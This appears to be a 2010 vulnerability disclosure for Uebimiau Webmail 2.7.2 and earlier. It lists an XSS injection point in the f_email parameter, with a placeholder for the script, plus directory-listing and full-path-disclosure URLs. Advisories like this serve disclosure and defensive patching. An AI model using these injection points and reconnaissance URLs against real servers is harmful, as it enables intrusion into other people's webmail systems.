# Exploit Title: Uebimiau Webmail <= 2.7.2 Multiple Vulnerabilities.
# Date: 13/03/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com<http://gmail.com> | www.DigitalWhisper.co.il<http://www.DigitalWhisper.co.il>
# Software Link: http://www.uebimiau.org/
# Version: <= 2.7.2
# Tested on: PHP
#
##[Cross Site Scripting]
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. (OWASP)
#
http://[SERVER]/webmail/index.php?lid=en_US&tid=clean&f_user=&six=3&f_email=[YOUR_XSS_HERE]
#
#
##[Directory Listing:]
#
http://[SERVER]/webmail/inc
http://[SERVER]/webmail/images/
http://[SERVER]/webmail/extra/
http://[SERVER]/webmail/themes/
http://[SERVER]/webmail/smarty
#
##[Full Path Disclosure:]
Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. (OWASP)
#
The following pages require files without checking if they exist. loading them will return a Fatal Errors and Warnings ("No such file or directory") with includes their Full-Path:
#
http://[SERVER]/webmail/inc/class.uebimiau.php
http://[SERVER]/webmail/inc/class.uebimiau_mail.php
http://[SERVER]/webmail/inc/config.php
http://[SERVER]/webmail/inc/inc.php
http://[SERVER]/webmail/smarty/Smarty_Compiler.class.php
http://[SERVER]/webmail/smarty/plugins/function.html_select_date.php
http://[SERVER]/webmail/smarty/plugins/function.html_select_time.php
http://[SERVER]/webmail/smarty/plugins/modifier.date_format.php
#
#
[e0f]